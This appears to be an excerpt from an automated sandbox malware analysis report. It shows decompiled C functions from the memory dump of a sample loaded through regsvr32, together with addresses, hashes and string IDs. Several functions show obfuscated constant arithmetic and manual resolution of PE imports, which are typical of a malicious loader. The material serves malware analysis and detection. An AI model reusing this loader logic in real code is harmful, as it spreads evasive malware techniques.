0x00000000
0x003c497b
0x003c4988
0x003c4ad2
0x00000000
0x003c498e
0x003c4990
0x003c4a53
0x003c4a5f
0x003c4a64
0x003c4a6c
0x003c4a74
0x003c4a7c
0x003c4a84
0x003c4a8c
0x003c4a94
0x003c4a9c
0x003c4aa4
0x003c4aac
0x003c4ac0
0x003c4ac5
0x003c4ac8
0x00000000
0x003c4996
0x003c499b
0x003c49a1
0x003c49ad
0x003c49b5
0x003c49bd
0x003c49c1
0x003c49c9
0x003c49d1
0x003c49d9
0x003c49e1
0x003c49e9
0x003c49f1
0x003c49f9
0x003c49fe
0x003c4a06
0x003c4a0e
0x003c4a23
0x003c4a2d
0x003c4a2e
0x003c4a3f
0x003c4a37
0x003c4a3c
0x003c4a3c
0x00000000
0x003c4a39
0x003c4a39
0x003c4a3a
0x003c4a49
0x00000000
0x00000000
0x00000000
0x003c4a3a
0x003c4a4c
0x003c4a4c
0x00000000
0x003c4a4c
0x00000000
0x003c4a47
0x003c499b
0x003c4990
0x003c4b66
0x003c4b6b
0x00000000
0x00000000
0x003c4b7b
0x003c4b7b
0x003c4ad9
0x003c4ae3
0x003c4aeb
0x003c4af3
0x003c4af8
0x003c4b00
0x003c4b08
0x003c4b15
0x003c4b1e
0x003c4b22
0x003c4b2a
0x003c4b32
0x003c4b3a
0x003c4b4a
0x003c4b4f
0x003c4b59
0x003c4b5e
0x003c4b61
0x00000000

Strings

|W, xrefs: 003C4B3A
'&W~, xrefs: 003C4AA4

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: '&W~$|W
API String ID: 0-2499742803
Opcode ID: 25e98fa21474586c473ab93ef3bf5ce45b6c5b50617c691d673174203acee175
Instruction ID: 8ea3b6cf78e847e9c2946bcce823f319245f7224048ec3ff922fb8fab88bd267
Opcode Fuzzy Hash: 25e98fa21474586c473ab93ef3bf5ce45b6c5b50617c691d673174203acee175
Instruction Fuzzy Hash: 475143764083428BC315DF24E589A1BBBE4FBD5754F100E1DF592A6221E3B4CE4D8B97

Uniqueness

Uniqueness Score: -1.00%

Function 003C53F6 Relevance: 2.6, Strings: 2, Instructions: 106
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E003C53F6(void* __eax, void* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t107;
				void* _t111;
				intOrPtr _t123;
				intOrPtr* _t124;
				intOrPtr* _t125;
				void* _t126;

				_t123 =  *0x3e2214; // 0x28e2e0
				_t111 = __ecx;
				_v20 = 0x78a6a;
				_t124 = _t123 + 0x214;
				while(1) {
					_t125 =  *_t124;
					if(_t125 == 0) {
						break;
					}
					__eflags =  *(_t125 + 0x44);
					if( *(_t125 + 0x44) == 0) {
						L4:
						 *_t124 =  *_t125;
						_v12 = 0xdc1c8a;
						_v12 = _v12 << 6;
						_v12 = _v12 >> 0xa;
						_v12 = _v12 * 0x4b;
						_v12 = _v12 ^ 0x040d9629;
						_v16 = 0xad77be;
						_v16 = _v16 + 0x5532;
						_v16 = _v16 * 0x1c;
						_v16 = _v16 ^ 0x130284db;
						_v8 = 0x766cf3;
						_v8 = _v8 << 5;
						_v8 = _v8 << 0xe;
						_v8 = _v8 ^ 0x67900b9d;
						_v20 = 0xbec320;
						_v20 = _v20 * 0x30;
						_t96 =  &_v20;
						 *_t96 = _v20 ^ 0x23cd3fed;
						__eflags =  *_t96;
						_t107 = E003C79D0(_v12, _v16,  *_t96, _v8, _t125, _v20);
						_t126 = _t126 + 0xc;
					} else {
						_v12 = 0x6f2e5c;
						_v12 = _v12 + 0x6947;
						_v12 = _v12 + 0x2ef9;
						_v12 = _v12 >> 0xe;
						_v12 = _v12 ^ 0x000001bf;
						_v8 = 0xce5ca0;
						_v8 = _v8 + 0xfffff2d8;
						_v8 = _v8 + 0xffff4919;
						_v8 = _v8 >> 5;
						_v8 = _v8 ^ 0x000c1483;
						_v16 = 0x74e7c7;
						_v16 = _v16 >> 0xc;
						_v16 = _v16 ^ 0x0000c111;
						_t107 = E003C23E3(_v8, _t111, _v16,  *((intOrPtr*)(_t125 + 0x30)));
						__eflags = _t107 - _v12;
						if(_t107 != _v12) {
							_t124 = _t125;
						} else {
							 *((intOrPtr*)(_t125 + 8))( *(_t125 + 0x44), 0, 0);
							_v8 = 0xab37f7;
							_v8 = _v8 + 0xe57b;
							_v8 = _v8 ^ 0x00a11cfd;
							_v12 = 0x9924b7;
							_v12 = _v12 + 0xffff4426;
							_v12 = _v12 ^ 0x009e3e9c;
							_v16 = 0xc36873;
							_v16 = _v16 << 0xc;
							_v16 = _v16 ^ 0x368e8e85;
							E003C5CF1(_v8, _v12,  *(_t125 + 0x44), _v16);
							_v12 = 0x6e448d;
							_v12 = _v12 << 0x10;
							_v12 = _v12 >> 4;
							_v12 = _v12 + 0xffff4f9d;
							_v12 = _v12 ^ 0x04407e4e;
							_v8 = 0x3f23d4;
							_v8 = _v8 >> 7;
							_v8 = _v8 << 0xa;
							_t65 =  &_v8;
							 *_t65 = _v8 ^ 0x01f326e5;
							__eflags =  *_t65;
							E003D4FB8( *((intOrPtr*)(_t125 + 0x30)), _v12, _v8);
							_t126 = _t126 + 0xc;
							goto L4;
						}
					}
				}
				return _t107;
			}

0x003c53ff
0x003c5405
0x003c5407
0x003c540e
0x003c55a8
0x003c55a8
0x003c55ac
0x00000000
0x00000000
0x003c5419
0x003c541d
0x003c552b
0x003c552d
0x003c552f
0x003c5536
0x003c553a
0x003c5542
0x003c5545
0x003c554c
0x003c5553
0x003c555e
0x003c5561
0x003c5568
0x003c556f
0x003c5573
0x003c5577
0x003c557e
0x003c5589
0x003c558c
0x003c558c
0x003c558c
0x003c55a0
0x003c55a5
0x003c5423
0x003c5423
0x003c542c
0x003c5433
0x003c543a
0x003c543e
0x003c5445
0x003c544c
0x003c5453
0x003c545a
0x003c545e
0x003c5465
0x003c546c
0x003c5470
0x003c5480
0x003c5487
0x003c548a
0x003c55b9
0x003c5490
0x003c5497
0x003c549a
0x003c54a1
0x003c54a8
0x003c54af
0x003c54b6
0x003c54bd
0x003c54c4
0x003c54cb
0x003c54cf
0x003c54e2
0x003c54e7
0x003c54ee
0x003c54f2
0x003c54f6
0x003c54fd
0x003c5504
0x003c550b
0x003c550f
0x003c5513
0x003c5513
0x003c5513
0x003c5523
0x003c5528
0x00000000
0x003c5528
0x003c548a
0x003c541d
0x003c55b8

Strings

\.o, xrefs: 003C5423
(, xrefs: 003C53FF

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: \.o$(
API String ID: 0-1689437186
Opcode ID: 99a7dcbe2d7bed7532b0d2dc3769ae35fd5064f6bd5c57f97455f210e09588e0
Instruction ID: 120e9d51bc8f48c101a4a7146876163d9009180d807e023ed681a12da90760b2
Opcode Fuzzy Hash: 99a7dcbe2d7bed7532b0d2dc3769ae35fd5064f6bd5c57f97455f210e09588e0
Instruction Fuzzy Hash: F551EFB6C01708EBCB16DFA5D98999EFBB1FF40318F208498D512A7250D3B56B48DF40

Uniqueness

Uniqueness Score: -1.00%

Function 003C7336 Relevance: 2.6, Strings: 2, Instructions: 105
COMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E003C7336(void* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char _v32;
				signed short _v36;
				signed short _v40;
				intOrPtr _v44;
				char _v564;
				signed short _t98;
				signed int _t110;
				signed short* _t116;
				signed int _t117;
				signed int _t118;

				_v32 = 0;
				_v44 = 0x3dcd6;
				_v40 = 0;
				_v36 = 0;
				_v12 = 0xe7f8bc;
				_v12 = _v12 ^ 0x8cd72126;
				_v12 = _v12 << 5;
				_v12 = _v12 ^ 0x8618e6e8;
				_v8 = 0xeffd01;
				_v8 = _v8 ^ 0x80207e50;
				_v8 = _v8 + 0x22b6;
				_v8 = _v8 << 1;
				_v8 = _v8 ^ 0x019ae7bd;
				_push(__ecx);
				if(E003C5C58( &_v564, _v12, _v8) != 0) {
					_t98 = _v564;
					_t116 =  &_v564;
					if(_t98 != 0) {
						_t110 = _t98 & 0x0000ffff;
						while(_t110 != 0x5c) {
							_t116 =  &(_t116[1]);
							_t110 =  *_t116 & 0x0000ffff;
							if(_t110 != 0) {
								continue;
							} else {
							}
							goto L7;
						}
						_v16 = 0x339038;
						_v16 = _v16 ^ 0xe61c7ff1;
						_v16 = _v16 ^ 0xe62fefc8;
						_t116[_v16] = 0;
					}
					L7:
					_v16 = 0x7b5e4e;
					_v16 = _v16 << 0xa;
					_t117 = 0xe;
					_v16 = _v16 * 0x25;
					_v16 = _v16 ^ 0x528ebaa8;
					_v12 = 0xc4c560;
					_v12 = _v12 + 0xffff5f61;
					_v12 = _v12 | 0xe66f4da6;
					_v12 = _v12 * 0x55;
					_v12 = _v12 ^ 0xad7deea3;
					_v20 = 0x95cfde;
					_v20 = _v20 | 0x02b76b83;
					_v20 = _v20 * 0x21;
					_v20 = _v20 + 0xffffa802;
					_v20 = _v20 ^ 0x59bae97c;
					_v28 = 0x968cdd;
					_v28 = _v28 | 0x6296bd89;
					_v28 = _v28 ^ 0x62963314;
					_v24 = 0xd6fab2;
					_v24 = _v24 * 0x71;
					_v24 = _v24 ^ 0x5ee1e929;
					_v8 = 0x6da20f;
					_t118 = 0x13;
					_v8 = _v8 / _t117;
					_v8 = _v8 + 0xffff95ac;
					_v8 = _v8 / _t118;
					_v8 = _v8 ^ 0x000670f2;
					E003D9D52(_v16, _v12, _t118, _v20, _v28, _t118, _t118, _v24, _t118, _t118,  &_v564, _t118,  &_v32, _v8);
				}
				return _v32;
			}

0x003c7341
0x003c7344
0x003c734b
0x003c734e
0x003c7351
0x003c7358
0x003c735f
0x003c7363
0x003c736a
0x003c7371
0x003c7378
0x003c737f
0x003c7382
0x003c7389
0x003c739f
0x003c73a5
0x003c73ac
0x003c73b5
0x003c73b7
0x003c73ba
0x003c73c0
0x003c73c3
0x003c73c9
0x00000000
0x00000000
0x003c73cb
0x00000000
0x003c73c9
0x003c73cd
0x003c73d4
0x003c73db
0x003c73e7
0x003c73e7
0x003c73eb
0x003c73eb
0x003c73f4
0x003c73fe
0x003c7401
0x003c7404
0x003c740b
0x003c7412
0x003c7419
0x003c7424
0x003c7427
0x003c742e
0x003c7435
0x003c7440
0x003c7443
0x003c744a
0x003c7451
0x003c7458
0x003c745f
0x003c7466
0x003c7471
0x003c7474
0x003c747b
0x003c7487
0x003c7488
0x003c748d
0x003c7499
0x003c749f
0x003c74c6
0x003c74cb
0x003c74d4

Strings

N^{, xrefs: 003C73EB
)^, xrefs: 003C7474

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: )^$N^{
API String ID: 0-2539109969
Opcode ID: 1473fa3de6caf994f11b0025a32f2dc3955cfd45eb83c9fda0b61beba371c530
Instruction ID: 08a1de54b5cff2e0f79acf5e0356d6d2e2f3bace693be8bac622c6002b2825d3
Opcode Fuzzy Hash: 1473fa3de6caf994f11b0025a32f2dc3955cfd45eb83c9fda0b61beba371c530
Instruction Fuzzy Hash: 114100B5D1020AEBDB49CFA4C98AAAEBBB5FB04304F208199D815B6260E7B45B45DF50

Uniqueness

Uniqueness Score: -1.00%

Function 003E06E7 Relevance: 2.6, Strings: 2, Instructions: 104
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E003E06E7(void* __ecx, void* __edx, char _a4, signed int _a8, intOrPtr _a12) {
				signed int _v4;
				intOrPtr _v8;
				signed short _v12;
				signed int _v16;
				signed int _v20;
				void* _t77;
				void* _t80;
				signed short _t85;
				signed short _t87;
				signed short _t90;
				signed short* _t92;
				signed int _t94;
				intOrPtr _t102;
				signed int _t107;
				signed short _t108;
				signed short _t110;
				signed int* _t112;

				_push(_a12);
				_t107 = _a8;
				_push(_t107);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003C2528(_t77);
				_v4 = _v4 & 0x00000000;
				_t112 =  &(( &_v20)[5]);
				_v8 = 0x34ca;
				_t80 =  *((intOrPtr*)(_t107 + 0x3c)) + _t107;
				_a8 = 0x2335e2;
				_a8 = _a8 ^ 0x041a0dd5;
				_a8 = _a8 >> 8;
				_a8 = _a8 ^ 0x00043939;
				_t94 = _a8;
				_t102 =  *((intOrPtr*)(_t80 + 0x78 + _t94 * 8));
				if(_t102 == 0 ||  *((intOrPtr*)(_t80 + 0x7c + _t94 * 8)) == 0) {
					L13:
					return 1;
				} else {
					_t108 = _t102 + _t107;
					while(1) {
						_t83 =  *((intOrPtr*)(_t108 + 0xc));
						if( *((intOrPtr*)(_t108 + 0xc)) == 0) {
							goto L13;
						}
						_v16 = 0xa7af13;
						_v16 = _v16 << 0xa;
						_v16 = _v16 ^ 0x9eb1d07b;
						_v20 = 0x28582;
						_v20 = _v20 | 0x79c90961;
						_v20 = _v20 ^ 0x79cd6f50;
						_a8 = 0x16c0d0;
						_a8 = _a8 << 0xc;
						_a8 = _a8 ^ 0x6c036939;
						_t85 = E003CF6A5(_v16, _v20, _t83 + _t107, _a8);
						_v12 = _t85;
						__eflags = _t85;
						if(_t85 == 0) {
							L15:
							return 0;
						}
						_t92 =  *_t108 + _t107;
						_t110 =  *((intOrPtr*)(_t108 + 0x10)) + _t107;
						while(1) {
							_t87 =  *_t92;
							__eflags = _t87;
							if(__eflags == 0) {
								break;
							}
							if(__eflags >= 0) {
								_t99 = _t107 + 2 + _t87;
								__eflags = _t107 + 2 + _t87;
							} else {
								_t99 = _t87 & 0x0000ffff;
							}
							_v16 = 0x8fa3e5;
							_v16 = _v16 >> 0xf;
							_v16 = _v16 ^ 0x00031a6b;
							_a8 = 0x75b6f5;
							_a8 = _a8 << 5;
							_a8 = _a8 + 0x9356;
							_a8 = _a8 + 0x3673;
							_a8 = _a8 ^ 0x0eb3a8eb;
							_v20 = 0xb2b1b3;
							_v20 = _v20 >> 5;
							_v20 = 0x15;
							_v20 = _v20 / _v20;
							_v20 = _v20 ^ 0x00016708;
							_t90 = E003CF755(_v16, _v12, _t99, _a8, _v20);
							_t112 =  &(_t112[3]);
							__eflags = _t90;
							if(_t90 == 0) {
								goto L15;
							} else {
								 *_t110 = _t90;
								_t92 =  &(_t92[2]);
								_t110 =  &_a4;
								__eflags = _t110;
								continue;
							}
						}
						_t108 = _t108 + 0x14;
						__eflags = _t108;
					}
					goto L13;
				}
			}

0x003e06ee
0x003e06f2
0x003e06f6
0x003e06f7
0x003e06fb
0x003e06fc
0x003e06fd
0x003e0702
0x003e0707
0x003e070d
0x003e0715
0x003e0717
0x003e071f
0x003e0727
0x003e072c
0x003e0734
0x003e0738
0x003e073e
0x003e0878
0x00000000
0x003e074f
0x003e074f
0x003e086d
0x003e086d
0x003e0872
0x00000000
0x00000000
0x003e0757
0x003e0761
0x003e0766
0x003e076e
0x003e0776
0x003e077e
0x003e0786
0x003e078e
0x003e0793
0x003e07a8
0x003e07ad
0x003e07b3
0x003e07b5
0x003e0883
0x00000000
0x003e0883
0x003e07c0
0x003e07c2
0x003e0860
0x003e0860
0x003e0862
0x003e0864
0x00000000
0x00000000
0x003e07c9
0x003e07d3
0x003e07d3
0x003e07cb
0x003e07cb
0x003e07cb
0x003e07d5
0x003e07df
0x003e07e4
0x003e07ec
0x003e07f4
0x003e07f9
0x003e0801
0x003e0809
0x003e0811
0x003e0819
0x003e0822
0x003e0832
0x003e0836
0x003e084b
0x003e0850
0x003e0853
0x003e0855
0x00000000
0x003e0857
0x003e0857
0x003e085a
0x003e085d
0x003e085d
0x00000000
0x003e085d
0x003e0855
0x003e086a
0x003e086a
0x003e086a
0x00000000
0x003e086d

Strings

s6, xrefs: 003E0801
5#, xrefs: 003E0717

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: s6$5#
API String ID: 0-842419735
Opcode ID: 0389ec4451b8abbe9cb4b332dcaadc5bd316c4fe627cbadd56b374ac5f308e3c
Instruction ID: 1837106f56caef6ab4147946a181a774c53b98a7a56684de6d7d4c790934e2f8
Opcode Fuzzy Hash: 0389ec4451b8abbe9cb4b332dcaadc5bd316c4fe627cbadd56b374ac5f308e3c
Instruction Fuzzy Hash: 08417BB15083919FC309DF22D845A1BB7E5FBD8708F054A1CF4A5A6250D3B0EA09CF96

Uniqueness

Uniqueness Score: -1.00%

Function 003C4E03 Relevance: 2.6, Strings: 2, Instructions: 101
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E003C4E03(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				void* _t113;
				signed int _t121;
				signed int _t131;
				signed int _t132;
				void* _t140;
				signed int _t141;

				_push(_a8);
				_t140 = __ecx;
				_push(_a4);
				_push(__ecx);
				E003C2528(_t113);
				_v40 = 0x4d485;
				_v36 = 0x5f4d2;
				_v32 = 0x4b9e1;
				_v28 = 0xf0edf;
				_v8 = 0xab6dbc;
				_v8 = _v8 + 0x515c;
				_v8 = _v8 >> 4;
				_v8 = _v8 + 0x32c;
				_v8 = _v8 ^ 0x00099c8e;
				_v12 = 0xff6a0e;
				_v12 = _v12 >> 8;
				_v12 = _v12 + 0xffffd84c;
				_v12 = _v12 ^ 0x00046416;
				E003C48C6();
				_v20 = 0xd10eca;
				_v20 = _v20 + 0x9927;
				_v20 = _v20 + 0xffffe87e;
				_v20 = _v20 ^ 0x00d1906b;
				_v16 = 0xa61d04;
				_v16 = _v16 * 0x7f;
				_v16 = _v16 + 0xd815;
				_v16 = _v16 ^ 0x52693d01;
				_v12 = 0x1536e4;
				_v12 = _v12 + 0xbcd2;
				_v12 = _v12 ^ 0x2967fe1f;
				_v12 = _v12 + 0xffff516b;
				_v12 = _v12 ^ 0x29714804;
				_v8 = 0x8954da;
				_v8 = _v8 ^ 0xf4afe4d2;
				_v8 = _v8 >> 0xe;
				_v8 = _v8 + 0xffff7914;
				_v8 = _v8 ^ 0x000e1a93;
				_t121 = E003C2B6C(_v20, _v16);
				_v16 = 0xe99ff3;
				_t141 = _t121;
				_v16 = _v16 + 0xffffbcc1;
				_v16 = _v16 | 0x56cd1c78;
				_v16 = _v16 ^ 0x56e33af1;
				_v8 = 0xb2f57;
				_v8 = _v8 + 0x1dc9;
				_v8 = _v8 + 0xffff1340;
				_v8 = _v8 + 0xffffdbad;
				_v8 = _v8 ^ 0x0008c115;
				_v20 = 0x7eba0c;
				_v20 = _v20 << 0xf;
				_t131 = 0x35;
				_v20 = _v20 / _t131;
				_v20 = _v20 ^ 0x01caa83a;
				_v12 = 0x332ed1;
				_t132 = 0x33;
				_v12 = _v12 * 0x63;
				_v12 = _v12 + 0x45e4;
				_v12 = _v12 | 0x7872742d;
				_v12 = _v12 ^ 0x7bf1430b;
				_v24 = 0x3f18f7;
				_v24 = _v24 / _t132;
				_v24 = _v24 ^ 0x00013cb8;
				E003CAF67(_v16, _v24, _t140, _v8, _t141, _v20, _v12);
				 *((short*)(_t140 + _t141 * 2)) = 0;
				return 0;
			}

0x003c4e0b
0x003c4e0e
0x003c4e10
0x003c4e14
0x003c4e15
0x003c4e1a
0x003c4e21
0x003c4e28
0x003c4e2f
0x003c4e36
0x003c4e3d
0x003c4e44
0x003c4e48
0x003c4e4f
0x003c4e56
0x003c4e5d
0x003c4e61
0x003c4e68
0x003c4e75
0x003c4e7a
0x003c4e84
0x003c4e8b
0x003c4e92
0x003c4e99
0x003c4ea4
0x003c4ea7
0x003c4eae
0x003c4eb5
0x003c4ebc
0x003c4ec3
0x003c4eca
0x003c4ed1
0x003c4ed8
0x003c4edf
0x003c4ee6
0x003c4eea
0x003c4ef1
0x003c4f04
0x003c4f09
0x003c4f10
0x003c4f12
0x003c4f1b
0x003c4f22
0x003c4f29
0x003c4f30
0x003c4f37
0x003c4f3e
0x003c4f45
0x003c4f4c
0x003c4f53
0x003c4f5c
0x003c4f61
0x003c4f66
0x003c4f6d
0x003c4f78
0x003c4f79
0x003c4f7c
0x003c4f83
0x003c4f8a
0x003c4f91
0x003c4f9d
0x003c4fa0
0x003c4fb8
0x003c4fc2
0x003c4fcb

Strings

\Q, xrefs: 003C4E3D
-trx, xrefs: 003C4F83

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: -trx$\Q
API String ID: 0-3138022959
Opcode ID: 57408cd5b2afe7ecd67f15c0905ce674180b7a066d189df2548cf95e67b80be4
Instruction ID: 5e32e6a6710085daff79922b38b4337381937008e8601f1bea462d40b16da45d
Opcode Fuzzy Hash: 57408cd5b2afe7ecd67f15c0905ce674180b7a066d189df2548cf95e67b80be4
Instruction Fuzzy Hash: DC51EFB5D01309EBCF49DFA5C98A4EEBBB0FF40318F208199D511AA260D3B94B59DF90

Uniqueness

Uniqueness Score: -1.00%

Function 003DE4E3 Relevance: 2.6, Strings: 2, Instructions: 85
COMMONCrypto

Download Yara Rule

C-Code - Quality: 60%

			E003DE4E3(signed int _a4) {
				signed int _v8;
				signed int _v12;
				void* __ecx;
				intOrPtr _t84;
				intOrPtr* _t85;
				signed int _t95;
				signed int _t108;

				_push(_t91);
				_t108 = _a4;
				_push(0);
				_push(1);
				_v12 = 0x9cc8f;
				_push( *((intOrPtr*)(_t108 + 0x44)));
				if( *((intOrPtr*)(_t108 + 8))() != 0) {
					_v12 = 0xb28ffb;
					_v12 = _v12 + 0x8535;
					_v12 = _v12 ^ 0x00bd8877;
					_v8 = 0xd0d7d3;
					_v8 = _v8 + 0xffff276f;
					_v8 = _v8 << 0xf;
					_v8 = _v8 ^ 0xffa2f395;
					_a4 = 0x5ffd86;
					_a4 = _a4 + 0x17b1;
					_a4 = _a4 >> 0x10;
					_a4 = _a4 >> 0xf;
					_a4 = _a4 ^ 0x000cb15a;
					_t84 = E003E0887(_v12, _v8, _a4, 0x3c1188);
					_v8 = 0x1a3bb8;
					_t105 = _t84;
					_v8 = _v8 ^ 0xebef9c07;
					_v8 = _v8 >> 8;
					_v8 = _v8 * 0x32;
					_v8 = _v8 ^ 0x2e130072;
					_a4 = 0xe77fe4;
					_a4 = _a4 + 0xd687;
					_a4 = _a4 + 0xffff6205;
					_a4 = _a4 >> 7;
					_a4 = _a4 ^ 0x000ca5e4;
					_push( *((intOrPtr*)(_t108 + 0x44)));
					_push(_a4);
					_t85 = E003C990D(_t84, _v8);
					if(_t85 != 0) {
						 *_t85();
					}
					_v8 = 0x3b6acc;
					_v8 = _v8 ^ 0xa448d7f7;
					_v8 = _v8 ^ 0xf158dc4c;
					_v8 = _v8 >> 0xc;
					_v8 = _v8 ^ 0x000bfb49;
					_v12 = 0xe8847e;
					_t95 = 0x6d;
					_v12 = _v12 * 0x3b;
					_v12 = _v12 << 0xc;
					_v12 = _v12 ^ 0x6896f7b8;
					_a4 = 0x372f49;
					_a4 = _a4 + 0xffffa8f6;
					_a4 = _a4 / _t95;
					_a4 = _a4 + 0xffff8598;
					_a4 = _a4 ^ 0x000e7529;
					E003C43D3(_v8, _v12, _a4, _t105);
				}
				return 0;
			}

0x003de4e7
0x003de4e9
0x003de4ec
0x003de4ee
0x003de4f0
0x003de4f7
0x003de4ff
0x003de505
0x003de50c
0x003de513
0x003de51a
0x003de521
0x003de528
0x003de52c
0x003de533
0x003de53a
0x003de541
0x003de545
0x003de549
0x003de55f
0x003de564
0x003de56b
0x003de56d
0x003de574
0x003de57c
0x003de581
0x003de588
0x003de58f
0x003de596
0x003de59d
0x003de5a1
0x003de5a8
0x003de5ab
0x003de5b1
0x003de5bb
0x003de5bd
0x003de5bd
0x003de5bf
0x003de5c8
0x003de5cf
0x003de5d6
0x003de5da
0x003de5e1
0x003de5ee
0x003de5f0
0x003de5f3
0x003de5f7
0x003de5fe
0x003de605
0x003de611
0x003de614
0x003de61b
0x003de62b
0x003de632
0x003de639

Strings

r, xrefs: 003DE581
I/7, xrefs: 003DE5FE

Memory Dump Source

Source File: 00000003.00000002.464950285.00000000003C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000003.00000002.464941185.00000000003C0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.464992033.00000000003E2000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_3c0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: I/7$r
API String ID: 0-89616622
Opcode ID: 0b0c7fccd5b3c1051efb352573c285e2b1252541e2a148ce3fb0c8d1c328aad3
Instruction ID: c1f02a1acc7e0a52406805010c440da86d487130b633dc92b7e6d922f1476ea3
Opcode Fuzzy Hash: 0b0c7fccd5b3c1051efb352573c285e2b1252541e2a148ce3fb0c8d1c328aad3
Instruction Fuzzy Hash: 15410B71901308FBDF59DFA4C94A9CDBFB1EB50754F20C09DE845AA250D7B59B84DB80

Uniqueness

Uniqueness Score: -1.00%

Function 100268AA Relevance: 1.6, APIs: 1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E100268AA(void* __edx, int _a4, int _a8, char* _a12, int _a16) {
				signed int _t22;
				intOrPtr _t24;
				void* _t27;
				int _t34;
				intOrPtr _t37;
				void* _t39;
				void* _t42;
				void* _t43;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t49;
				void* _t50;
				void* _t51;
				char* _t52;

				_t49 = __edx;
				_t51 = 0;
				_t50 = 0x1a;
				while(1) {
					_t34 = _a16;
					asm("cdq");
					_t22 = _t50 + _t51 - _t49 >> 1;
					_t37 =  *((intOrPtr*)(0x10091790 + _t22 * 0x2c));
					if(_a4 == _t37) {
						break;
					}
					if(_a4 >= _t37) {
						_t51 = _t22 + 1;
					} else {
						_t50 = _t22 - 1;
					}
					if(_t51 <= _t50) {
						continue;
					} else {
						L6:
						return GetLocaleInfoA(_a4, _a8, _a12, _t34);
					}
				}
				_t39 = _a8 - 1;
				if(_t39 == 0) {
					_t24 = 0x10091794 + _t22 * 0x2c;
					L22:
					if(_t24 == 0 || _t34 < 1) {
						goto L6;
					} else {
						_t52 = _a12;
						E10025410(_t52, _t24, _t34 - 1);
						_t52[_t34 - 1] = _t52[_t34 - 1] & 0x00000000;
						_t27 = 1;
						return _t27;
					}
				}
				_t42 = _t39;
				if(_t42 == 0) {
					_t24 = 0x100917a0 + _t22 * 0x2c;
					goto L22;
				}
				_t43 = _t42 - 4;
				if(_t43 == 0) {
					_t24 = 0x100917a8 + _t22 * 0x2c;
					goto L22;
				}
				_t44 = _t43 - 4;
				if(_t44 == 0) {
					_t24 = 0x100917ac + _t22 * 0x2c;
					goto L22;
				}
				_t45 = _t44 - 0xff6;
				if(_t45 == 0) {
					_t24 =  *((intOrPtr*)(0x1009179c + _t22 * 0x2c));
					goto L22;
				}
				_t46 = _t45 - 1;
				if(_t46 == 0) {
					_t24 =  *((intOrPtr*)(0x100917a4 + _t22 * 0x2c));
					goto L22;
				}
				if(_t46 != 0) {
					goto L6;
				}
				_t24 = 0x100917b4 + _t22 * 0x2c;
				goto L22;
			}

0x100268aa
0x100268b2
0x100268b4
0x100268b5
0x100268b8
0x100268bb
0x100268be
0x100268c5
0x100268ce
0x00000000
0x00000000
0x100268d3
0x100268da
0x100268d5
0x100268d5
0x100268d5
0x100268df
0x00000000
0x100268e1
0x100268e1
0x00000000
0x100268eb
0x100268df
0x100268fb
0x100268fc
0x1002695c
0x10026961
0x10026963
0x00000000
0x10026972
0x10026972
0x1002697b
0x10026983
0x1002698a
0x00000000
0x1002698a
0x10026963
0x100268ff
0x10026900
0x10026952
0x00000000
0x10026952
0x10026902
0x10026905
0x10026948
0x00000000
0x10026948
